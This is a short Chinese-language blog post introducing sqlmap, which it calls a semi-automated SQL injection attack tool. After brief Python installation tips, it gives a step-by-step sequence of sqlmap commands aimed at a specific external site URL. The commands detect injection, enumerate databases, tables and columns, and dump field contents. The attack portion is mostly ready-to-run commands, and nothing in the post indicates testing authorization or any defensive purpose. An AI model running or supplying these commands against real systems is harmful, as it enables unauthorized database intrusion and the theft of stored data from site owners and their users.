当前位置: 代码迷 >> 综合 >> sql神器--SQLMAP
  详细解决方案

sql神器--SQLMAP

热度:76   发布时间:2024-02-09 18:50:20.0

sqlmap 是一个基于命令行的半自动化sql注入攻击工具,成功执行sqlmap,需要安装python(建议用python2)+sqlmap

---自动百度安装

tip:

1、python安装后,设置系统环境变量--path,最终cmd下输出python后有输出即可。

2、sqlmap直接安装到python目录下(例如直接解压到D:/Python27),生成--sqlmapproject-sqlmap-5650abb,

cmd下执行后有如下图展示,代表成功

开始sql注入尝试

1、扫描站点是否存在注入漏洞

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"

2、扫描数据库

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  --dbs

3、扫描数据库表

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  --tables

4、扫描字段名

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  -T 表名  --columns

5、获取字段内容

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"  -D   数据库名  -T 表名  -C 字段值  --dump